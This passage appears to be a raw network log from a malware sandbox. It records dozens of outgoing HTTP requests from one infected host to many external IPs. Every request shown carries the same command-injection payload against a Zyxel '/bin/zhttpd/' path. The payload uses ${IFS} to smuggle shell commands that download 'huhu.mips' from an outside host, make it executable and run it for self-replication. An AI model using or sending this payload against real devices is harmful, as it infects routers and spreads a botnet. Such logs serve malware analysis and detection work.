                                            Feb 2, 2024 06:21:31.007251024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9161192.168.2.1541326207.160.95.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007268906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9162192.168.2.1553230207.47.166.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007364035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9163192.168.2.1544710165.152.65.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007414103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9164192.168.2.1538408135.124.15.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007467985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9165192.168.2.154936695.105.214.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007513046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9166192.168.2.155009270.153.198.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007554054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9167192.168.2.153328478.126.0.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007627010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9168192.168.2.154212693.122.138.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007627964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9169192.168.2.1534548146.48.183.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007666111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9170192.168.2.1538126191.137.107.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007704973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9171192.168.2.15340849.59.87.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007739067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9172192.168.2.155088853.137.216.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007776976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9173192.168.2.15510544.128.59.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007822990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9174192.168.2.1541864114.45.91.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007848024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9175192.168.2.1542828120.226.202.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007898092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9176192.168.2.1535114186.198.130.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007944107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9177192.168.2.1535060151.224.91.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.007976055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9178192.168.2.153909223.218.247.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008013964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9179192.168.2.153362876.235.11.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008048058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9180192.168.2.154340844.40.215.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008095026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9181192.168.2.154840638.181.74.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008119106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9182192.168.2.1549358153.95.125.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008156061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9183192.168.2.155637663.127.86.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008219957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9184192.168.2.1539702191.154.174.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008270979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9185192.168.2.1549322102.91.87.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008294106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9186192.168.2.155772299.112.165.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008337021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9187192.168.2.154774695.121.88.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008367062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9188192.168.2.154150283.232.196.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008397102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9189192.168.2.1558342178.205.187.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008439064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9190192.168.2.1548540208.180.160.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008487940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9191192.168.2.1543824148.96.248.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008521080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9192192.168.2.1559736149.67.213.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008544922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9193192.168.2.155594686.97.15.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008594036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9194192.168.2.154122227.61.186.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008629084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9195192.168.2.154952253.53.160.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008671999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9196192.168.2.1553548193.244.143.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008687019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9197192.168.2.1534892104.246.141.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008734941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9198192.168.2.1545016140.172.18.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008788109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9199192.168.2.1545614155.151.229.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008814096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9200192.168.2.1538220142.141.213.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008869886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9201192.168.2.156001672.133.237.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008953094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9202192.168.2.155126690.134.234.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008969069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9203192.168.2.1554294213.226.191.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008970976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9204192.168.2.153841831.45.85.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.008970976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9205192.168.2.154062263.148.114.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009020090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9206192.168.2.153770441.14.55.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009063959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9207192.168.2.155664217.181.80.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009083986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9208192.168.2.1552136158.194.127.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009126902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9209192.168.2.1546078131.213.76.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009169102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9210192.168.2.153885280.112.229.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009198904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9211192.168.2.1545430163.39.1.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009274006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9212192.168.2.15348524.193.182.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009320974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9213192.168.2.1550576102.106.114.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009345055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9214192.168.2.1551364172.89.83.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009390116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9215192.168.2.1553744118.89.200.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009407997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9216192.168.2.155695668.188.222.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009452105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9217192.168.2.1535674150.179.146.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009495020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9218192.168.2.1543436202.32.245.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009537935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9219192.168.2.1548998118.35.234.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009556055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9220192.168.2.1546066101.180.230.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009625912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9221192.168.2.1556630155.244.94.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009639978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9222192.168.2.1534988153.155.35.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009680033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9223192.168.2.1540626181.103.166.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009722948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9224192.168.2.1551436172.251.126.22443
                                            TimestampBytes transferredDirectionData
